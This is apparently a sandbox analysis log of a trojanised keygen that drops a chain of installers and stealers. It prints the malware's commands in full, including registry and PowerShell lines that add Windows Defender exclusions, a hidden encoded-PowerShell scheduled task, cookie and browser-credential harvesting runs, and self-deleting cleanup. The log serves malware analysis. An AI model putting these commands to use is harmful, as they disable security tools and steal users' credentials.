PID 4428 wrote to memory of 1616	4428	keygen-step-4.exe	Setup.exe
PID 4428 wrote to memory of 1616	4428	keygen-step-4.exe	Setup.exe
PID 3504 wrote to memory of 1868	3504	keygen-step-3.exe	cmd.exe
PID 3504 wrote to memory of 1868	3504	keygen-step-3.exe	cmd.exe
PID 3504 wrote to memory of 1868	3504	keygen-step-3.exe	cmd.exe
PID 1400 wrote to memory of 2308	1400	key.exe	key.exe
PID 1400 wrote to memory of 2308	1400	key.exe	key.exe
PID 1400 wrote to memory of 2308	1400	key.exe	key.exe
PID 1868 wrote to memory of 2340	1868	cmd.exe	PING.EXE
PID 1868 wrote to memory of 2340	1868	cmd.exe	PING.EXE
PID 1868 wrote to memory of 2340	1868	cmd.exe	PING.EXE
PID 1616 wrote to memory of 4668	1616	Setup.exe	multitimer.exe
PID 1616 wrote to memory of 4668	1616	Setup.exe	multitimer.exe
PID 1616 wrote to memory of 4664	1616	Setup.exe	setups.exe
PID 1616 wrote to memory of 4664	1616	Setup.exe	setups.exe
PID 1616 wrote to memory of 4664	1616	Setup.exe	setups.exe
PID 4428 wrote to memory of 2360	4428	keygen-step-4.exe	askinstall20.exe
PID 4428 wrote to memory of 2360	4428	keygen-step-4.exe	askinstall20.exe
PID 4428 wrote to memory of 2360	4428	keygen-step-4.exe	askinstall20.exe
PID 4664 wrote to memory of 216	4664	setups.exe	setups.tmp
PID 4664 wrote to memory of 216	4664	setups.exe	setups.tmp
PID 4664 wrote to memory of 216	4664	setups.exe	setups.tmp
PID 2360 wrote to memory of 4724	2360	askinstall20.exe	cmd.exe
PID 2360 wrote to memory of 4724	2360	askinstall20.exe	cmd.exe
PID 2360 wrote to memory of 4724	2360	askinstall20.exe	cmd.exe
PID 4724 wrote to memory of 748	4724	cmd.exe	taskkill.exe
PID 4724 wrote to memory of 748	4724	cmd.exe	taskkill.exe
PID 4724 wrote to memory of 748	4724	cmd.exe	taskkill.exe
PID 4668 wrote to memory of 1216	4668	multitimer.exe	multitimer.exe
PID 4668 wrote to memory of 1216	4668	multitimer.exe	multitimer.exe
PID 1216 wrote to memory of 2056	1216	multitimer.exe	multitimer.exe
PID 1216 wrote to memory of 2056	1216	multitimer.exe	multitimer.exe
PID 4428 wrote to memory of 532	4428	keygen-step-4.exe	file.exe
PID 4428 wrote to memory of 532	4428	keygen-step-4.exe	file.exe
PID 4428 wrote to memory of 532	4428	keygen-step-4.exe	file.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 532 wrote to memory of 2424	532	file.exe	IBInstaller_97039.exe
PID 532 wrote to memory of 2424	532	file.exe	IBInstaller_97039.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4392 wrote to memory of 4468	4392	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

5644 attrib.exe
6584 attrib.exe
7176 attrib.exe
8208 attrib.exe

pid	process
5644	attrib.exe
6584	attrib.exe
7176	attrib.exe
8208	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Clone.Dvd.2.9.1.0.keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Clone.Dvd.2.9.1.0.keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3492

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1400

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:2308

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:4060

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:2340

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4428

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616

C:\Users\Admin\AppData\Local\Temp\C53SZAZ7IT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\C53SZAZ7IT\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4668

C:\Users\Admin\AppData\Local\Temp\C53SZAZ7IT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\C53SZAZ7IT\multitimer.exe" 1 3.1616801265.605e6df1e2929 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1216

C:\Users\Admin\AppData\Local\Temp\C53SZAZ7IT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\C53SZAZ7IT\multitimer.exe" 2 3.1616801265.605e6df1e2929
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Users\Admin\AppData\Local\Temp\5kqr3312jst\x1fachb2j4i.exe
"C:\Users\Admin\AppData\Local\Temp\5kqr3312jst\x1fachb2j4i.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1572

C:\Users\Admin\AppData\Local\Temp\is-JCGCM.tmp\x1fachb2j4i.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JCGCM.tmp\x1fachb2j4i.tmp" /SL5="$6010A,2592217,780800,C:\Users\Admin\AppData\Local\Temp\5kqr3312jst\x1fachb2j4i.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4660

C:\Users\Admin\AppData\Local\Temp\is-A9E90.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-A9E90.tmp\winlthsth.exe"
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 496
11⤵
- Program crash
PID:5552

C:\Users\Admin\AppData\Local\Temp\hdsabdoaljp\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\hdsabdoaljp\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3004

C:\Users\Admin\AppData\Local\Temp\is-QFB1F.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QFB1F.tmp\Setup3310.tmp" /SL5="$10306,138429,56832,C:\Users\Admin\AppData\Local\Temp\hdsabdoaljp\Setup3310.exe" /Verysilent /subid=577
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1012

C:\Users\Admin\AppData\Local\Temp\is-APGU4.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-APGU4.tmp\Setup.exe" /Verysilent
10⤵
PID:5936

C:\Program Files (x86)\VR\Versium Research\customer5.exe
"C:\Program Files (x86)\VR\Versium Research\customer5.exe"
11⤵
PID:2052

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
12⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b edge
13⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b chrome
13⤵
PID:2720

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b firefox
13⤵
PID:5368

C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"
11⤵
PID:5200

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:196

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:3884

C:\Program Files (x86)\VR\Versium Research\RunWW.exe
"C:\Program Files (x86)\VR\Versium Research\RunWW.exe"
11⤵
PID:2864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\VR\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
12⤵
PID:4836

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RunWW.exe /f
13⤵
- Kills process with taskkill
PID:5640

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
13⤵
- Delays execution with timeout.exe
PID:232

C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"
11⤵
PID:5376

C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
11⤵
PID:4508

C:\Users\Admin\AppData\Local\Temp\is-LGO05.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LGO05.tmp\LabPicV3.tmp" /SL5="$20274,239334,155648,C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
12⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\is-IFHNI.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-IFHNI.tmp\ppppppfy.exe" /S /UID=lab214
13⤵
PID:5804

C:\Program Files\Mozilla Firefox\VRXYPCEQZF\prolab.exe
"C:\Program Files\Mozilla Firefox\VRXYPCEQZF\prolab.exe" /VERYSILENT
14⤵
PID:2640

C:\Users\Admin\AppData\Local\Temp\is-5AMTB.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5AMTB.tmp\prolab.tmp" /SL5="$60406,575243,216576,C:\Program Files\Mozilla Firefox\VRXYPCEQZF\prolab.exe" /VERYSILENT
15⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\a4-28fd0-802-ab097-b5104c3e1d956\SHizhesutamo.exe
"C:\Users\Admin\AppData\Local\Temp\a4-28fd0-802-ab097-b5104c3e1d956\SHizhesutamo.exe"
14⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\d5-55971-748-06680-61b0cecb58067\Lehubexuxi.exe
"C:\Users\Admin\AppData\Local\Temp\d5-55971-748-06680-61b0cecb58067\Lehubexuxi.exe"
14⤵
PID:2744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hzoazdzm.zon\gaooo.exe & exit
15⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\hzoazdzm.zon\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\hzoazdzm.zon\gaooo.exe
16⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:6136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gf44b3h.4rb\md7_7dfj.exe & exit
15⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\5gf44b3h.4rb\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\5gf44b3h.4rb\md7_7dfj.exe
16⤵
PID:5676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ljenlzup.2yp\HookSetp.exe & exit
15⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\ljenlzup.2yp\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\ljenlzup.2yp\HookSetp.exe
16⤵
PID:4680

C:\ProgramData\3609274.exe
"C:\ProgramData\3609274.exe"
17⤵
PID:6328

C:\ProgramData\8091923.exe
"C:\ProgramData\8091923.exe"
17⤵
PID:6436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aictkhpl.vr3\askinstall31.exe & exit
15⤵
PID:6488

C:\Users\Admin\AppData\Local\Temp\aictkhpl.vr3\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\aictkhpl.vr3\askinstall31.exe
16⤵
PID:208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pe1fqssl.kjt\customer6.exe & exit
15⤵
PID:6808

C:\Users\Admin\AppData\Local\Temp\pe1fqssl.kjt\customer6.exe
C:\Users\Admin\AppData\Local\Temp\pe1fqssl.kjt\customer6.exe
16⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
17⤵
PID:7028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dhi4o01g.k12\GcleanerWW.exe /mixone & exit
15⤵
PID:6784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ju2jo5gs.pxa\privacytools5.exe & exit
15⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\ju2jo5gs.pxa\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\ju2jo5gs.pxa\privacytools5.exe
16⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\ju2jo5gs.pxa\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\ju2jo5gs.pxa\privacytools5.exe
17⤵
PID:4472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ta4hlcv2.cuo\19.exe & exit
15⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\ta4hlcv2.cuo\19.exe
C:\Users\Admin\AppData\Local\Temp\ta4hlcv2.cuo\19.exe
16⤵
PID:3968

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\javcs\install.vbs"
17⤵
PID:6180

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcs\install.dll",install
18⤵
PID:6012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ytyvk0r1.p3z\b9706c20.exe & exit
15⤵
PID:3120

C:\Users\Admin\AppData\Local\Temp\ytyvk0r1.p3z\b9706c20.exe
C:\Users\Admin\AppData\Local\Temp\ytyvk0r1.p3z\b9706c20.exe
16⤵
PID:6592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izgeftmc.4sa\setup.exe /8-2222 & exit
15⤵
PID:7416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hr0nh2bc.oeg\setup.exe /S /kr /site_id=754 & exit
15⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\hr0nh2bc.oeg\setup.exe
C:\Users\Admin\AppData\Local\Temp\hr0nh2bc.oeg\setup.exe /S /kr /site_id=754
16⤵
PID:4604

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
17⤵
PID:7912

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
18⤵
PID:7324

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
19⤵
PID:8016

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
19⤵
- Modifies registry class
PID:5092

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ghjGWUdwd" /SC once /ST 01:40:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
17⤵
- Creates scheduled task(s)
PID:6560

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ghjGWUdwd"
17⤵
PID:5260

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ghjGWUdwd"
17⤵
PID:8612

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 23:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\BeMnpdb.exe\" 9n /site_id 754 /S" /V1 /F
17⤵
- Creates scheduled task(s)
PID:7048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0sar4bwk.0qu\Four.exe & exit
15⤵
PID:7788

C:\Users\Admin\AppData\Local\Temp\0sar4bwk.0qu\Four.exe
C:\Users\Admin\AppData\Local\Temp\0sar4bwk.0qu\Four.exe
16⤵
PID:7452

C:\Users\Admin\AppData\Local\Temp\RSTTI1I8CG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RSTTI1I8CG\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:7592

C:\Users\Admin\AppData\Local\Temp\RSTTI1I8CG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RSTTI1I8CG\multitimer.exe" 1 3.1616801455.605e6eaf2ccf9 104
18⤵
PID:7520

C:\Users\Admin\AppData\Local\Temp\RSTTI1I8CG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RSTTI1I8CG\multitimer.exe" 2 3.1616801455.605e6eaf2ccf9
19⤵
PID:7864

C:\Users\Admin\AppData\Local\Temp\fgiblaxvq55\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\fgiblaxvq55\AwesomePoolU1.exe"
20⤵
PID:3772

C:\Users\Admin\AppData\Local\Temp\xq5arcx43oj\piwtpdluokb.exe
"C:\Users\Admin\AppData\Local\Temp\xq5arcx43oj\piwtpdluokb.exe" /ustwo INSTALL
20⤵
PID:8080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "piwtpdluokb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xq5arcx43oj\piwtpdluokb.exe" & exit
21⤵
PID:8744

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "piwtpdluokb.exe" /f
22⤵
- Kills process with taskkill
PID:8276

C:\Users\Admin\AppData\Local\Temp\ln4oq1ageve\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\ln4oq1ageve\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:6352

C:\Users\Admin\AppData\Local\Temp\is-1M46P.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1M46P.tmp\Setup3310.tmp" /SL5="$105F6,138429,56832,C:\Users\Admin\AppData\Local\Temp\ln4oq1ageve\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:6856

C:\Users\Admin\AppData\Local\Temp\is-KD0JL.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KD0JL.tmp\Setup.exe" /Verysilent
22⤵
PID:5164

C:\Users\Admin\AppData\Local\Temp\b1jqi3jgslt\vict.exe
"C:\Users\Admin\AppData\Local\Temp\b1jqi3jgslt\vict.exe" /VERYSILENT /id=535
20⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\is-3ITFJ.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3ITFJ.tmp\vict.tmp" /SL5="$105FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\b1jqi3jgslt\vict.exe" /VERYSILENT /id=535
21⤵
PID:6472

C:\Users\Admin\AppData\Local\Temp\is-0KGTV.tmp\winhost.exe
"C:\Users\Admin\AppData\Local\Temp\is-0KGTV.tmp\winhost.exe" 535
22⤵
PID:8800

C:\Users\Admin\AppData\Local\Temp\rfjkkvmrgua\u2ejmxvkef1.exe
"C:\Users\Admin\AppData\Local\Temp\rfjkkvmrgua\u2ejmxvkef1.exe" /1-610
20⤵
PID:8956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Dark-Morning'
21⤵
PID:9028

C:\Program Files (x86)\Dark-Morning\7za.exe
"C:\Program Files (x86)\Dark-Morning\7za.exe" e -p154.61.71.51 winamp.7z
21⤵
PID:7752

C:\Program Files (x86)\Dark-Morning\u2ejmxvkef1.exe
"C:\Program Files (x86)\Dark-Morning\u2ejmxvkef1.exe" /1-610
21⤵
PID:9108

C:\Users\Admin\AppData\Local\Temp\jqfjlknegfe\app.exe
"C:\Users\Admin\AppData\Local\Temp\jqfjlknegfe\app.exe" /8-23
20⤵
PID:9120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Misty-Tree'
21⤵
PID:9192

C:\Program Files (x86)\Misty-Tree\7za.exe
"C:\Program Files (x86)\Misty-Tree\7za.exe" e -p154.61.71.51 winamp.7z
21⤵
PID:6088

C:\Program Files (x86)\Misty-Tree\app.exe
"C:\Program Files (x86)\Misty-Tree\app.exe" /8-23
21⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\0YMW5VJW8U\setups.exe
"C:\Users\Admin\AppData\Local\Temp\0YMW5VJW8U\setups.exe" ll
17⤵
PID:7560

C:\Users\Admin\AppData\Local\Temp\is-9O4SD.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9O4SD.tmp\setups.tmp" /SL5="$503BC,478262,251392,C:\Users\Admin\AppData\Local\Temp\0YMW5VJW8U\setups.exe" ll
18⤵
PID:7444

C:\Program Files (x86)\VR\Versium Research\RmSetp.exe
"C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"
11⤵
PID:6088

C:\ProgramData\2060421.exe
"C:\ProgramData\2060421.exe"
12⤵
PID:4708

C:\ProgramData\6543071.exe
"C:\ProgramData\6543071.exe"
12⤵
PID:2140

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
13⤵
PID:640

C:\Program Files (x86)\VR\Versium Research\C1OWaGtG2GAP.exe
"C:\Program Files (x86)\VR\Versium Research\C1OWaGtG2GAP.exe"
11⤵
PID:5244

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
12⤵
PID:2456

C:\Program Files (x86)\VR\Versium Research\lylal220.exe
"C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
11⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\is-JT87O.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JT87O.tmp\lylal220.tmp" /SL5="$20278,491750,408064,C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
12⤵
PID:4808

C:\Users\Admin\AppData\Local\Temp\is-V6E2P.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-V6E2P.tmp\Microsoft.exe" /S /UID=lylal220
13⤵
PID:5140

C:\Users\Admin\AppData\Local\Temp\aa-9bc36-eae-63c8f-64e354b445aa6\Saebifyhyru.exe
"C:\Users\Admin\AppData\Local\Temp\aa-9bc36-eae-63c8f-64e354b445aa6\Saebifyhyru.exe"
14⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\13-b1c0b-eba-50e89-807540fdff0e3\Sylewepulae.exe
"C:\Users\Admin\AppData\Local\Temp\13-b1c0b-eba-50e89-807540fdff0e3\Sylewepulae.exe"
14⤵
PID:4644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bypklxgi.eqb\gaooo.exe & exit
15⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\bypklxgi.eqb\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\bypklxgi.eqb\gaooo.exe
16⤵
PID:6956

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:6832

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:6324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u35gejih.tkw\md7_7dfj.exe & exit
15⤵
PID:7092

C:\Users\Admin\AppData\Local\Temp\u35gejih.tkw\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\u35gejih.tkw\md7_7dfj.exe
16⤵
PID:6756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fukoqek2.buq\HookSetp.exe & exit
15⤵
PID:3592

C:\Users\Admin\AppData\Local\Temp\fukoqek2.buq\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\fukoqek2.buq\HookSetp.exe
16⤵
PID:6360

C:\ProgramData\2079515.exe
"C:\ProgramData\2079515.exe"
17⤵
PID:6348

C:\ProgramData\6562164.exe
"C:\ProgramData\6562164.exe"
17⤵
PID:6544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yo4e0coq.3t2\askinstall31.exe & exit
15⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\yo4e0coq.3t2\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\yo4e0coq.3t2\askinstall31.exe
16⤵
PID:6740

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
17⤵
PID:1736

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
18⤵
- Kills process with taskkill
PID:6520

